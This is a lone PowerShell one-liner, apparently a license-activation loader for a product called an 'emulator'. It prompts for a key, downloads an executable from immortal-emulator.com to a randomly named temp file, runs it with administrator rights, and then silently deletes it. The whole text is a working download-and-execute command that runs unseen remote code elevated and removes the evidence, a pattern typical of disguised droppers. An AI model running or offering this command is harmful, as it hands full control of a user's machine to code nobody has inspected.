$k=(Read-Host 'License key').Trim();if(-not $k){Write-Host 'no license entered' -ForegroundColor Red;return};$u='https://immortal-emulator.com/get_loader2';$t=[IO.Path]::Combine([IO.Path]::GetTempPath(),[IO.Path]::GetRandomFileName()+'.exe');(New-Object Net.WebClient).DownloadFile($u,$t);Start-Process $t -ArgumentList $k -Verb RunAs -Wait;Remove-Item $t -Force -ErrorAction SilentlyContinue